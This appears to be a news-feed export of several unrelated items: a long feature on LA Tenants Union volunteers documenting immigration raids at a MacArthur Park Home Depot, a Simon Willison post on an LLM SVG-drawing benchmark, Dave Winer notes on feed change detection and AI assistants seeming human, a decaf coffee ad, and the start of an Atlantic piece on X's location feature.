Immigration Raids at This Home Depot Got More Aggressive but Less Effective. The LA Tenants Union Knows Why. Stephanie Mon, 11/24/2025 - 23:09 ...
Original Article

Arturo had only ever seen agents at the border before, never in Los Angeles. But on Friday, June 6, the Department of Homeland Security descended on a Home Depot near MacArthur Park. As on any other morning, Arturo had arrived at the store to wait alongside more than a hundred jornaleros for a day, or even a few hours, of construction work. He saw people running and heard screams of “la migra” before he laid eyes on the men in fatigues or understood that they were making arrests. He broke into a run, following a crowd through the store’s automatic doors. Agents were grabbing people seemingly at random “by their backpacks and without questioning them,” Arturo said. DHS seized 24 people at that Home Depot and 60 others in raids carried out throughout the city that day. He hasn’t seen two of his friends since.

Los Angeles has long been an urban laboratory for militarized repression — the Los Angeles Police Department invented SWAT teams and pioneered the use of police helicopters. But on June 6, the federal government made its opening gambit in what Trump called “the largest deportation operation in American history,” turning Los Angeles into a “test case,” in the words of Mayor Karen Bass, for its fascist incursion into American cities. In both small “snatch and grab” operations and large-scale raids that maximize spectacle as much as detentions, DHS dispatched armed, masked agents to that same MacArthur Park Home Depot multiple times over the summer — to kidnap workers, street vendors, and bystanders, without warrants or warning.

But since that first raid, agents haven’t entered the lot without encountering a DHS watch, staffed entirely by volunteers and organized by the LA Tenants Union. Like DHS, LATU spent the summer experimenting. Organizers built a long-term protective presence, developing relationships with those targeted and connecting people in detention with financial and legal support. They can’t stop the raids, but they have seen the direct impact of their work in shortened raid times and lower arrest rates. As the Trump administration expands its deportation project across the country, LATU’s efforts demonstrate the infrastructure and commitment needed to mount a response to an ever-changing, militarized, and lawless assault.

On the first day of DHS’s escalation, Los Angeles responded in open revolt. Dozens of people gathered outside Ambiance Apparel downtown as a raid was still underway, chased more agents to Chinatown, and then reconverged in front of the Metropolitan Detention Center and downtown U.S. Immigration and Customs Enforcement field office. The next day, militant crowds responded to ICE officers staging near a Home Depot in Paramount, on the southern edge of Los Angeles County, throwing cinder blocks at ICE vehicles and setting off fireworks toward police. That night, Trump deployed thousands of National Guard troops to the city, over the protests of Bass and Gov. Gavin Newsom. Trump promised to “liberate Los Angeles from the Migrant Invasion, and put an end to these Migrant riots.”

By Sunday, the downtown demonstrations swelled to thousands. Protestors took over the 101 freeway, set Waymos on fire, and chucked Lime scooters at police cars. The LAPD responded by firing tear gas and rubber bullets into the crowd at close range. Bass issued a curfew for the area. The days of mass actions led to more than 200 arrests and multiple injuries. One LA Tenants Union member was shot with “less than lethals” in each knee and a shin. He said the initial wave of protests to claim the streets would set the tone for the summer: fighting for “the right to stay so that you wouldn’t be kicked out.”

But as energy waned and police repression escalated, organizers faced a familiar challenge: trying to channel an uprising into sustained and coordinated action. Many Angelenos joined rapid-response networks to support roving ICE watches in their communities. But as Kevin, a LATU organizer, explained, early ICE watches often devolved into games of “cat and mouse.” (Last names have been omitted in this article to protect its sources.) Alerts — sometimes false — would go out in massive group chats, sending people racing to the scene, but often too late to intervene or even document an arrest.

Instead, LATU organizers attempted to root themselves in a specific place and community. Founded in 2015 (I helped start the organization), LATU is run by volunteers and sustained largely by members’ monthly dues; it has grown to almost 3,000 members with 14 local chapters. The same demographics that inspire the Trump administration to call Southern California “ground zero for the effects of the border crisis” make immigrants the majority of LATU’s base. According to the latest data, nearly 1 million undocumented people now live in Los Angeles County, a full third of residents are immigrants, and more than half speak a language other than English at home. Arturo joined LATU the previous April because of deteriorating conditions at his building, a boardinghouse with multiple people sharing a bedroom and sometimes even a bed, where he rents “a closet” for $380 a month. But he never expected to rely on the tenant union at work.

To respond to DHS’s attack on their community, LATU organizers relied on existing capacities to develop relationships of trust and borrowed strategies from years of organizing against displacement in tenants’ homes and neighborhoods. “How do you orient yourself in one very particular place that is under attack,” Kevin asked, “where it’s less about a commitment to some abstract immigrant, but actual people who you can hopefully build relationships with?”

Organizers turned to the site of the very first raid in their neighborhood, the MacArthur Park Home Depot. They studied the rhythms of the space, with its two entrances along Wilshire and on Union Avenue. They slowly introduced themselves to the workers, some leaning on the green gate that wraps around the block, ready to greet vehicles, others sitting around folding tables at the Central American Resource Center (CARECEN) Day Labor Center, a simple shed with a corrugated metal roof that adjoins the Home Depot lot. They met the street vendors who start setting up before sunrise, lining that corner down Shatto to sell pupusas, fresh orange juice, and eggs.

Just one week after the first raid, on June 13, LATU’s Koreatown local launched the organization’s first Centro de Defensa Communitaria — “Community Defense Center” in English, and “Centro” for short. Butterflies adorned a “migration is sacred” banner that hung from one orange pop-up tent. On another, an Old English tattoo font spelled out “Chinga la Migra.” Volunteers used oranges as paperweights to keep know-your-rights flyers from blowing away. They handed out donated food and water and maintained a watch from 7 a.m. to 12 p.m., so that day laborers and vendors had a measure of safety in seeking a day’s work. In the first weeks, the Centro boasted 20 to 30 volunteers a day. Some would arrive and work at remote jobs via mobile hot spots, ready to participate in an instant protest if agents returned.

Over time, a routine was established, with a few people manning the tables and a few on patrols. Most critical were those stationed at each entrance, practicing the “ever-changing art,” as LATU organizer Zoie put it, of identifying ICE and Customs and Border Patrol vehicles. Volunteers looked for obvious tells — Sprinter vans, new American cars, tinted windows, paper license plates, plate numbers that don’t appear in public databases — and tracked their movements over walkie-talkies. Relying on information shared across a regional coalition, they matched plates with those seen at previous raids or emerging from DHS staging grounds on Terminal Island. Recently, DHS developed more elaborate disguises for their vehicles; one Ford SUV sported a “Coexist” decal on its trunk.

According to White House Deputy Chief of Staff Stephen Miller, DHS has set a goal of 1 million deportations this year. In June, Congress gave the department the resources to realize such results — $170 billion in funding that will turn ICE into the 16th-largest military force in the world and double its detention-bed capacity to more than 100,000 people. In May, Miller ordered ICE’s 50 top field leads not to bother targeting undocumented people with criminal records. “Just go out there and arrest illegal aliens,” he said. He specifically urged them to target Home Depots.

The pattern of raids in Los Angeles shows DHS heeded his directive. An independent study of 200 raids carried out in Los Angeles County between June 6 and August 14 revealed that three-quarters of arrests were made at workplaces and half at home improvement stores. Its authors call Home Depot parking lots “one of the most dangerous spaces for immigrant workers in Los Angeles.” But the threat of hunger and homelessness have forced many to return. Rent was due, Arturo told me; despite his fears, he had to go back.

From his post on Union Street, Kevin described the MacArthur Park Home Depot where Arturo often works as a “snapshot” of the U.S. economy, revealing “descending levels of vulnerability and expulsion from regular work and regular recognition.” In the parking lot, day laborers wait for work —“day kidnapping,” in the words of one organizer — and street vendors wait to serve them. Across the way, other men gather to play music from a boombox and drink — a surplus of the pushed out and given up.

CARECEN organizer Jorge Nicolas described the “symbiotic relationship” between big-box home improvement stores and the jornaleros drawn to them: “Home Depot grew because of day laborers. And day laborers grew because of Home Depot.” The “do it yourself” movement didn’t mean just you do the work; it meant you could cut out the contractor and hire cheaper and more exploitable help.

Since it opened in 2004, the CARECEN center has negotiated wages between jornaleros and employers, helped guard against wage theft, provided occupational safety and know-your-rights workshops, and offered free hot meals every day. Some 200 to 400 workers gathered over the course of the day, and the line of vendors wrapped around the corner on both sides of Shatto Street. Before June, ICE agents had restricted their involvement with the Home Depot to “intimidation,” strolling through to “visit” on their off hours, Nicolas said. Now the Home Depot felt like a “funeral.” Nicolas updated the center’s record-keeping practices to protect people’s identities and canceled its daily meal provision.

The construction industry’s margins rely on squeezing labor costs, and contractors turn to temporary workers to perform the most grueling jobs. A quarter of California’s and 40 percent of Los Angeles’s construction workers are undocumented immigrants. Some have lived in the city for decades, while others are recent arrivals. Many, like Arturo, left their families in their country of origin. When Covid-19 shutdowns shuttered his business in Mexico City, Arturo was lured to the United States by the “strength of currency” and the potential for sending remittances to his wife and two kids. He turned to Home Depot when he found other employment options limited by his immigration status.

Jorge, a maintenance worker at a local nursing home who has worked as a day laborer on and off since coming to the United States, said that “a lot of doors are closed” to immigrants “based on our ethnicity and the color of our skin.” He joined LATU over a year ago when his landlord tried to illegally kick him out of his apartment. One day, she’d even changed his locks. With the support of the organization, he managed to secure his housing and his lease. This spring, Jorge was one of many undocumented workers subcontracted to do the most brutal and dangerous work of the city’s wildfire recovery, tasked with power-washing ash and “pure asbestos” from burned-down houses between the Pacific Palisades and Malibu. Recalling the long-term health impacts on 9/11 responders, he quit. The agency paid him a third of what they’d originally promised.

LATU has compared the economic impact of the ongoing raids to the Covid-19 pandemic. Once again, people have holed up indoors, lost work, and lacked the resources for their biggest monthly expense: the rent. The UC Merced Community and Labor Center likened the scale of job loss in the city to December 2007, the first month of the Great Recession. Those statistics can be felt in empty streets and canceled celebrations, including the massive Central American Independence Day parade. At Los Angeles County Board of Supervisors meetings and local City Council offices, LATU has demanded that city officials back up their anti-Trump rhetoric with policies that will protect undocumented people; an eviction moratorium would give people refuge in their homes.

“In any other organizing situation, you can hold a meeting, you can hold a protest,” Kevin said. But in this case, “the very condition of being out in public is what’s endangering.” Forced to use public space as a workplace, jornaleros and street vendors are among the most vulnerable of DHS targets. And unlike farm workers, they don’t have organized bosses advocating for a stable labor supply. Agribusiness appeals to the Trump administration slowed agricultural raids, but ICE and Border Patrol attacks on day laborers and vendors have only intensified. The economic leverage that forced past waves of legalization and was dramatized in previous “Day Without Immigrants” protests doesn’t exist for those barely hanging on or shut out of work. Throughout the summer, reports circulated of CBP agents rounding up unhoused people.

On June 21, two weeks after the ICE invasion began, agents with black gaiters pulled over their faces leaped from a Dodge Charger on Union Street right next to the Home Depot. They snatched one man from his car, tackled and arrested another who tried to intervene, and pepper-sprayed a volunteer in the face from just inches away.

Though agents never crossed into the parking lot, it was the first test of Centro’s response and LATU’s new strategy of defense. “We’re a moral force,” Kevin said, “and hopefully that boosts the morale of people in the area in terms of people who are willing to step in.” Using their documentation of the event as well as their connections to the Labor Center and workers on the ground, they were able to identify the men whom DHS arrested, ensuring they would be connected to their communities and to legal counsel from the Immigrant Defenders Law Center (IMMDEF). DHS often publicizes humiliating photos of arrestees, but never a complete list of names. Without on-the-ground work to identify people taken, they effectively disappear — a family member simply wouldn’t come home one night; a co-worker wouldn’t return the next day.

“The goal of the raids is to isolate,” said Sarah Houston, a lawyer with IMMDEF’s new rapid-response team. DHS often delays or obscures its detainees’ entries into its location databases, making people difficult to track or reach when in custody. It also consistently denies them access to phone calls to contact their loved ones or legal counsel. That two-way isolation helps DHS pressure people to give up their rights to a full immigration hearing and sign voluntary departure agreements.

So do the conditions in detention centers. Designed as a temporary holding facility, the basement of the downtown ICE field office has since June served as a detention center in its own right. Those in custody report being stuck for over a week before transfer, forced to sleep on the floor, lacking access to showers and private bathrooms, and handed bags of potato chips and animal crackers as meals. They are also consistently denied medical care, even when agents’ violence during arrests leaves them with cuts, bruises, and even broken bones.

The Adelanto ICE Processing Center, an hour and a half north in San Bernardino, is no better. Run by the second-largest for-profit prison company in the United States, Adelanto has a track record of abysmal conditions — and at least three in-custody deaths — since it opened in 2011. This summer, its captive population quadrupled in just two months. Recent inspections reveal a lack of adequate food, linens, or even beds, and a pattern of withholding necessities like blood-pressure medication. Current detainees have described being “treated like dogs.”

Historically, detained undocumented people with access to legal defense are more than 10 times more likely to avoid deportation. Houston believes the same will hold true today, based on her recent experience securing the release of detainees in immigration and district court. And she’s hopeful about ongoing collaborations between community and legal defense. The documentation that volunteers gather may do more than bear witness to injustice; an illegal arrest can void an entire deportation case. In the meantime, Centro fund-raising efforts help deliver necessities to people inside and support families robbed of their breadwinners.

On July 3, IMMDEF, the ACLU, United Farm Workers, and other immigrant defense organizations filed a class-action lawsuit against the federal government. The suit argued that DHS’s “dragnet” violated the Fourth and Fifth Amendments — protections against unreasonable searches and violations of due process — and discriminated against individuals based on “the color of their skin” or “where they live or work.” A few days later, both the city and county of Los Angeles joined as plaintiffs.

That same week, Kevin watched from his volunteers’ table at the Home Depot as Border Patrol Tactical Units rolled down Wilshire. They were headed two blocks west to MacArthur Park. Soon armored vehicles blocked street traffic, a federal helicopter circled overhead, and nearly 100 agents fanned out through the park, alongside others on horseback. The National Guard helped provide “security.” No arrests were made.

Leaked documents about the operation confirmed that its purpose was a mere “show of presence.” Internal Army assessments claimed that “lethal violence” might result from encroaching on MS-13 “turf” and that the park served “as the largest open-air market of fake identification to enable illegal immigration.” But what agents encountered that day was St. John’s Community Health workers conducting outreach to unhoused people and schoolchildren at day camp. One L.A. City Council member commented that DHS should have “applied for a film permit.”

Overseeing so-called Operation Excalibur on the ground and fielding media requests in its wake was Gregory K. Bovino, the U.S. Border Patrol El Centro sector chief. Bovino was nearly pressured to resign under Biden, in part for posting a photo of himself with an M4 assault rifle on social media. But his star has risen under Trump. Now that photo is his profile picture, and he’s made content creation a part of his job. He often posts videos of foot chases at Home Depots set to dramatic soundtracks. In another video post, agents cuff, arrest, and place a sheer bag over the head of a protester “accused of assaulting a federal agent by spitting on him.”

Bovino celebrated Operation Excalibur in a Fox News interview, warning that the country had “better get used to us now, ’cause this is going to be normal very soon.” Bass also claimed victory after the event, as if she’d ordered the agents out of the park, but in her own words, they were already “getting ready to leave.” DHS has exposed the limitations of “sanctuary cities,” a technical designation that blocks local agencies from sharing information with the federal government but does not proactively protect undocumented people. Beyond a yet-unrealized promise of minimal cash assistance and her city attorney’s collaboration in the class-action suit, Bass’s fight against Trump’s deportation efforts has largely been rhetorical.

On July 12, the legal strategy claimed an initial win. A federal court in the Central District of California issued a restraining order preventing ICE and CBP from detaining people based on their race, language, and presence at locations like home improvement stores. For a few weeks, arrest rates did seem to slow. Zoie, the LATU organizer, began planning the best way to wind down the Centro and fold volunteers into the ongoing work of local tenant associations.

But the reprieve was short-lived. Just before 7 a.m. on Aug. 6, a yellow Penske truck pulled into the Home Depot lot from the Union entrance. The driver beckoned workers closer, speaking in Spanish and promising jobs. Then the truck’s rear door rolled up, revealing a cluster of CBP agents and an embedded Fox News reporter. Centro volunteers had just begun setting up their tents. They managed to document agents brandishing rifles at cooktops, coolers, and bags of chips. One street vendor was led away with her hands behind her back, checkered kitchen rag hanging from her belt.

Bovino dubbed the raid “Operation Trojan Horse,” writing on Instagram that the “legendary ruse” was used to “swiftly defeat potentially violent Anti-ICE protesters.” It was a chilling visual echo of a tactic used by the white supremacist Patriot Front, whose supporters had leaped from a Penske truck to disrupt a Pride event in Springfield, Mo., a month prior. It also seemed a blatant violation of the federal court’s restraining order. “For those who thought immigration enforcement had stopped in Southern California, think again,” acting Los Angeles U.S. Attorney Bill Essayli said that day. “There are no sanctuaries from the reach of the federal government.”

A DHS press officer said of the raid that the MacArthur Park Home Depot was once again targeted because local gangs had a “chokehold” on the area. But of the 16 people arrested, none had gang ties or had been convicted of a violent crime. Four were street vendors. Agents claimed they “got past these violent protesters to go conquer MS-13,” Zoie summarized. “No, you tackled a woman making pupusas and left her children without a mother.”

DHS’s emphasis on spectacle may satisfy the right’s thirst for public displays of cruelty. It may also be succeeding in instilling fear in undocumented people. While the ultimate promises of Trump’s deportation schemes — safer cities, better jobs, and cheaper housing for U.S. citizens — haven’t materialized, immigration itself has declined for the first time in nearly 60 years. Anecdotal evidence suggests many immigrants are questioning their ability to stay. “If things don’t change,” Arturo admitted, “I may self-deport.”

During one of my visits to the MacArthur Park Home Depot, a worker approached volunteers to thank them for stepping up when he himself could not. Kevin returned the gratitude, but told me he disagreed. Over time, he hoped the Centros could erode the division of labor between defenders and people most at risk. “You’re looking at thousands of family members in L.A. who have had people taken,” he said. “If you do ultimately want to stop what’s happening, it will take the people who are being affected organizing themselves.”

Jorge, the former day laborer, agreed. “We can’t let this fear beat us,” he said, “because eventually, fear will defeat everything.” Jorge called the raids a “massacre.” And the results have been deadly. At least three people died during DHS raids over the summer — among them Roberto Carlos Montoya Valdez, who was struck by a car and killed while fleeing a Home Depot raid in an L.A. suburb. Still, though Jorge’s family in Oaxaca has begged him to return, he has refused. He likened the experience of waiting to be kidnapped to getting touched by the grim reaper. “If I’m gonna die, I’m gonna die protecting my people,” he said. “I’ve got blood family, but these are my people, too. These are my neighbors.”

After the Penske raid, the Centro refined its hours and recommitted to the watch seven days a week. They launched a new shift to protect the three elementary schools in the area, sending volunteers to patrol in a safety vest with “Education sí, migra no” emblazoned on the back. Zoie and Nicolas started planning a new collaboration on roving food distribution, combining CARECEN’s resources and LATU’s network of tenant associations. By then, DHS had begun striking another target, L.A.’s car washes. “We’re catching sudspects across Southern California,” Bovino joked. “Wash, rinse, repeat.”

“They’re kind of like us,” Kevin observed. “Whenever there’s a movement, you try to find [a form] that’s replicable and intelligible.” The Centro model developed in MacArthur Park has been taken up by five other LATU local chapters and more defense organizations at Home Depots across the city. Organizers trade best practices — Centros have abandoned car patrols and added orientations to pull in new leaders — share information, and serve as one another’s support systems as they continue their work.

By late August, volunteers at the MacArthur Park Centro knew they were being watched. On Aug. 21, organizers tracked a suspicious car that twice circled the block and lingered in the Home Depot lot, though no one got out to shop. Sure enough, its plates matched those of a vehicle photographed at a car wash raid the day before. But agents basically admitted who they were; when they drove past the Wilshire table, Zoie said, the passenger leaned out the window and spat at her.

One week later, ICE returned in force, with a half dozen cars and nearly 40 agents. On the Wilshire side, two white vans careened to a stop, effectively blocking the entrances. Agents in fatigues or police vests and jeans jumped out to snatch the first people they could. Zoie picked up the bullhorn. “La migra está aquí,” she announced, as she’d rehearsed in her head for months. Many workers had remained close to the entrance and broke into a run down the street. One made a 20-foot leap from the lot onto Burlington Avenue, mangling his ankle. Zoie pointed her phone camera at the agents, their cars, and three jornaleros the agents managed to capture, shouting for their names and emergency contacts.

On the Union side, agents peeled in with equal speed, grabbing a vendor and multiple workers lining the descending ramp to the Home Depot lot. More agents turned against the dozens of volunteers, vendors, workers, and passers-by, escalating into riot dispersal tactics. They deployed pepper spray, scattered half a dozen pepper balls, and set off at least three tear gas canisters. “Back up for your safety,” one agent said, shoving a volunteer. “Get out of our city for our safety,” another volunteer snapped back, before the agent kicked a tear gas canister toward him. Agents tackled one worker to the ground as he tried to escape into the CARECEN center, stripping him of his shirt. “You don’t belong in our country,” Kevin shouted into the smoke.

Inside the store, the scene “felt like an active shooting,” one witness said. Home Depot employees, day laborers, and vendors streamed in to duck behind the exit’s sliding doors, some already sobbing. The entire event lasted less than five minutes. In all, the agents had taken nine people. They left behind a stinging haze, overturned shopping carts, and a community oscillating between despair and rage. On Shatto Street, a silver Toyota was stranded with its hazards on, plastic to-go containers still waiting on its trunk.

“At least we were here,” Zoie said, hopeful that the Centro’s presence had shortened the length of the raid. She collected a backpack from the asphalt to search for some kind of identification. The volunteers knew their tasks. They reviewed their footage to identify anyone who’d been taken. One isolated a face and went to the lumberyard where he’d often worked to match the image with a name. Others pulled out screenshots of the vehicles to share with the broader response network. CARECEN’s Nicolas made the calls to coordinate the removal of the abandoned Toyota; it wasn’t the first time DHS had taken someone and left their vehicle behind. A vendor told me she had no choice but to continue working, though her head and chest hurt from the gas. “The rent is coming,” she said.

About an hour later, Jay and his father came to the Home Depot to see if a day laborer who hadn’t shown up for work that morning had been taken. Second- and first-generation immigrants with a shared construction business, both had been present at previous raids; in Cypress Park, agents had slammed Jay to the ground and attempted to detain him. Jay said the Trump administration was using the tactics of El Salvador’s strongman president Nayib Bukele “as a template.” He wanted to make sure his worker didn’t end up in Salvadoran prison.

By 9 a.m., the police paid a visit. LAPD Central Bureau Deputy Chief German Hurtado said he and two other officers were present to “share the space” with the community and clarify that the LAPD was not a participant in the raid. But distinguishing his organization from immigration enforcement was all his department would do — any more would be against federal law. “People say, oh, you know, LAPD doesn’t follow the rules and this and that,” Hurtado said, “but now they don’t want us to follow the rules when it comes to obstruction of justice.”

After the agents peeled away, Zoie had dialed the number of one jornalero she saw detained, expecting no answer. Pablo and Zoie had been present almost every day, him leaning on a concrete pylon waiting for work, her watching the entrance. They’d bonded over a shared love of L.A.’s plant life, often texting each other pictures of nature’s odd interactions with urban space. On the morning of the late August raid, Zoie hadn’t gotten a chance to say hello before she spotted Pablo in the Border Patrol van. She was shocked when he picked up the phone. He was already on the bus, heading back to the Home Depot.

“She thought it was the last adios,” Pablo joked when he returned. He said he didn’t run from the agents, which might have given them “reasonable suspicion,” but he had another reason. Though he had crossed the border from Mexico when he was 16, he was a U.S. citizen. Before agents pulled the van into the downtown field office, they finally asked the workers about their immigration status. Pablo told them his Social Security number and handed them his ID. They dumped him out on the corner. He was relieved not to enter the gates. “Every second is forever in there,” he said. “Even the ride they took me on. It felt like forever.”

There will be no official record of Pablo’s seizure. DHS reported that eight people had been arrested at the raid. By September, it listed the location of those I could track as Adelanto Detention Center. Organizers told me that three had already signed agreements to leave the country. “Everybody’s rights have been violated,” Nicolas summarized, from the volunteers’ right to protest to the human right to migrate and make a home wherever you are.

In mid-August, DHS opened its largest detention center in California yet, a hundred miles north of Los Angeles. Once a state prison, the California City facility had been shut down after years of organized pressure. Now it’s operated by CoreCivic, one of many private companies turning the capture of undocumented workers into a revenue stream. Meanwhile, ICE has boasted 175,000 new applicants to its force. By Aug. 26, DHS had made 5,000 arrests in Los Angeles — a rate of 70 a day. And in early September, the restraining order against discriminatory raids was stayed by the Supreme Court, acting through its “shadow docket.” Bovino celebrated this “vindication” with the hashtag #WhoopsWeDidItAgain. Soon after, he and his army touched down in Chicago.

The challenge of this moment, Kevin said, will be continuing to organize “as the emergency becomes the norm.” Centro volunteers are committed to holding the line at the Home Depot through a daily presence, expanding collaborations with IMMDEF and CARECEN, and deepening relationships with the jornaleros and vendors who also return there each day. Each time their Home Depot had been raided, DHS had used more agents but managed to capture fewer people. LATU’s organizers feel they can slow down the administration’s plans. But to stop the largest deportation project in U.S. history will take much more. “People look to God for help, but God isn’t going to come down to help,” Jorge told me. “God gave us our brains and our hands to do something about it. And so we have to.”

[Tracy Rosenthal is a writer and an organizer. They are a co-author of Abolish Rent: How Tenants Can End the Housing Crisis , published by Haymarket, and their essays, features, and opinions have appeared in The New Republic, The Nation, the Los Angeles Times, and elsewhere. They are now on rent strike in New York City.]


LLM SVG Generation Benchmark

Simon Willison
simonwillison.net
2025-11-25 04:02:25
LLM SVG Generation Benchmark Here's a delightful project by Tom Gally, inspired by my pelican SVG benchmark. He asked Claude to help create more prompts of the form Generate an SVG of [A] [doing] [B] and then ran 30 creative prompts against 9 frontier models - prompts like "an octopus operating a pi...
Original Article

LLM SVG Generation Benchmark (via) Here's a delightful project by Tom Gally, inspired by my pelican SVG benchmark. He asked Claude to help create more prompts of the form Generate an SVG of [A] [doing] [B] and then ran 30 creative prompts against 9 frontier models - prompts like "an octopus operating a pipe organ" or "a starfish driving a bulldozer".

Here are some for "butterfly inspecting a steam engine":

Gemini 3.0 Pro Preview drew the best steam engine with nice gradients and a butterfly hovering near the chimney. DeepSeek V3.2-Exp drew a floating brown pill with a hint of a chimney and a butterfly possibly on fire. GLM-4.6 did the second best steam engine with a butterfly nearby. Qwen3-VL-235B-A22B-Thinking did a steam engine that looks a bit like a chest on wheels and a weird purple circle.

And for "sloth steering an excavator":

Claude Sonnet 4.5 drew the best excavator with a blobby sloth driving it. Claude Opus 4.5 did quite a blocky excavator with a sloth that isn't quite recognizable as a sloth. Grok Code Fast 1 drew a green alien standing on a set of grey blocks. Gemini 2.5 Pro did a good excavator with another blobby sloth.

It's worth browsing the whole collection, which gives a really good overall indication of which models are the best at SVG art.
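
If you want to reproduce a few of these prompts locally, here is a rough sketch using the llm Python library. It is not Gally's actual harness: the model ID, the subject/activity pairs, and the file naming are all illustrative, and it assumes a configured Anthropic plugin and key.

import llm

# Prompts follow the benchmark's template: "Generate an SVG of [A] [doing] [B]".
pairs = [
    ("an octopus", "operating a pipe organ"),
    ("a butterfly", "inspecting a steam engine"),
    ("a sloth", "steering an excavator"),
]

model = llm.get_model("claude-opus-4.5")  # hypothetical choice of model

for subject, activity in pairs:
    prompt = f"Generate an SVG of {subject} {activity}"
    svg = model.prompt(prompt).text()
    filename = f"{subject}_{activity}".replace(" ", "_") + ".svg"
    with open(filename, "w") as f:
        f.write(svg)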

Simple Rule of Thumb: AI Systems Shouldn’t Pretend to Be Human

Daring Fireball
scripting.com
2025-11-25 02:17:24
Dave Winer: The new Amazon Alexa with AI has the same basic problem of all AI bots, it acts as if it’s human, with a level of intimacy that you really don’t want to think about, because Alexa is in your house, with you, listening, all the time. Calling attention to an idea that there’s a pseudo-...
Original Article

It's even worse than it appears..

I'm working today in the internals of FeedLand, specifically the code that determines if an item has changed. When we check a feed, we check each item, if the item already exists, we look at each of the values stored for the item compared with their new values in the feed, and if any have changed, we broadcast the message that the item has changed. I'm doing a complete review of this, based on actual data, and found there were a fair number of places we were calling a change, when nothing that mattered had changed. Now I'm debating whether or not a pubDate change should be seen as an item change. My initial thought when we were working on RSS, was that the pubDate should never change. In the real world of publishing I don't think the publication date changes. Right? Of course some feeds do change the pubDate because that's the art of feeds (sorry for the sarcasm). But I don't think FeedLand should call that a change. Wondering what other feed developers do? So I asked ChatGPT. This is incredibly valuable research. One thing I learned is that people use atom:updated. It's true RSS 2.0 has no item that says when an item updated. Anyway net-net, the consensus is that a change in pubDate is not a change. I don't think I'm going to make it immutable though. #
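
A minimal sketch of the change-detection idea under discussion (not FeedLand's actual code, which is JavaScript; the field names here are hypothetical): compare only the fields that matter, so a feed that rewrites pubDate on every fetch is not broadcast as changed.

# Decide whether a feed item really changed, ignoring pubDate so that
# date-churning feeds don't trigger false update broadcasts.
SIGNIFICANT_FIELDS = ("title", "link", "description", "enclosure")

def item_changed(stored, incoming):
    # True if any field we care about differs between the stored copy
    # of the item and the copy just read from the feed.
    return any(stored.get(f) != incoming.get(f) for f in SIGNIFICANT_FIELDS)

old = {"title": "Hello", "link": "http://example.com/1", "pubDate": "Mon, 24 Nov 2025 00:00:00 GMT"}
new = {"title": "Hello", "link": "http://example.com/1", "pubDate": "Tue, 25 Nov 2025 00:00:00 GMT"}
assert item_changed(old, new) is False  # only pubDate moved, so nothing is broadcast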

The new Amazon Alexa with AI has the same basic problem of all AI bots, it acts as if it's human, with a level of intimacy that you really don't want to think about, because Alexa is in your house, with you, listening, all the time. Calling attention to an idea that there's a pseudo-human spying on you is bad. Alexa depends on the opposite impression, that it's just a computer. I think AIs should give up the pretense that they're human, and this one should be first. #

[Sponsor] Dekáf Coffee Roasters — Holiday Gift Bundles

Daring Fireball
dekaf.com
2025-11-25 02:02:12
Meet our new Holiday Gift Bundles, curated sets of our most loved coffees designed for effortless gifting. Nine single origins. Six signature blends. Four Mizudashi cold brews. All micro-lot and top-rated coffees shipped within 24 hours of roasting. No shortcuts. No crash. This is coffee at its mos...
Original Article

DECAF REDEFINED.

JOIN THE DEKÁF REVOLUTION.

We promise decaf coffee indulgence: bold flavor that's gentle on the caffeine. All your favorite parts of coffee without compromise.

GET STARTED

  • PREMIUM MICRO-LOT COFFEES

  • SMALL-BATCH ROASTED TO ORDER

  • SHIPPED WITHIN 24HRS OF ROAST

NEW AT DEKÁF!

  • CURATED COFFEE BUNDLES

    Check out our new coffee bundles! Choose between a Light roast, Dark roast, or a curated Roaster's Pick bundle. The perk? No caffeine, and built-in savings per bundle.

    EXPLORE COFFEE BUNDLES

  • CURATED SUBSCRIPTION SETS

    Only interested in Single Origins? Or only coffee Blends? We've curated four new subscription sets so you can sip the way you want.

    EXPLORE SUBSCRIPTION SETS

ENJOY VARIETY IN YOUR SUBSCRIPTION?

  • THE ROASTER'S CHOICE SUBSCRIPTION

    Our full Dekáf collection. Choose fully decaffeinated or low-caff too.

    VIEW

  • THE SINGLE ORIGINS SUBSCRIPTION

    A rotating subscription of our nine Single Origin coffees. Fully decaffeinated.

    VIEW

  • THE SIGNATURE BLENDS SUBSCRIPTION

    A rotating subscription of our four Signature Blends. Fully decaffeinated.

    VIEW

  • THE LOW-CAFFEINE SUBSCRIPTION

    A rotating subscription of our two low-caffeine creations 25%-50% caffeinated.

    VIEW

JOURNEY THROUGH OUR DECAFFEINATED

SINGLE ORIGINS

Savor the pure character of each coffee-growing region with our Single Origin Collection. Carefully sourced from select farms and roasted to accentuate each bean’s unique flavor notes, this decaffeinated collection offers a truly distinct taste journey - one origin at a time.

THE SINGLE ORIGIN COLLECTION

COME AND EXPLORE OUR DECAFFEINATED

SIGNATURE BLENDS

Discover our meticulously crafted Signature Blends. Fully decaffeinated, these blends combine complementary beans from around the world. The balanced roasts deliver captivating layers of flavor and perfection for every coffee moment. Never compromise.

THE SIGNATURE BLEND COLLECTION

DIVE INTO OUR

LOW-CAFFEINE BLENDS

Looking to scale back on caffeine without relinquishing the nuanced pleasure of a fine brew? Our lightly caffeinated Dekáf collection offers a refined balance, allowing the preservation of the depth and richness you crave while gently tempering the caffeine for a more mindful experience.

THE LOW-CAFFEINE COLLECTION

KEEP IT COOL WITH DEKÁF'S

MIZUDASHI COLD BREW CONCENTRATES

A gentle brewing method. A quiet kind of coffee. Mizudashi is a traditional Japanese method of brewing coffee with cold water. Instead of steeping, we slow-drip cold water for a smooth, low-acid, refreshing brew with natural sweetness and subtle depth.

THE MIZUDASHI COLLECTION

FOR THE LOVE OF PURE COFFEE...

Dekáf stands for quality without compromise. We're dedicated to creating exceptional decaffeinated coffee that stands toe-to-toe with the world's finest caffeinated beans.

We source premium beans from micro-lot farmers, roast in small batches to every coffee order, and ship within 24 hours of roasting.

Our coffee is bright, nuanced, and full of life.
It's remarkable coffee that just happens to be decaf.

‘A Worthless, Poisoned Hall of Mirrors’

Daring Fireball
www.theatlantic.com
2025-11-25 01:48:34
Charlie Warzel, writing for The Atlantic: X’s decision to show where accounts are based is, theoretically, a positive step in the direction of transparency for the platform, which has let troll and spam accounts proliferate since Musk’s purchase, in late 2022. And yet the scale of the deception ...
Original Article

Over the weekend, Elon Musk’s X rolled out a feature that had the immediate result of sowing maximum chaos. The update, called “About This Account,” allows people to click on the profile of an X user and see such information as: which country the account was created in, where its user is currently based, and how many times the username has been changed. Nikita Bier, X’s head of product, said the feature was “an important first step to securing the integrity of the global town square.” Roughly four hours later, with the update in the wild, Bier sent another post: “I need a drink.”

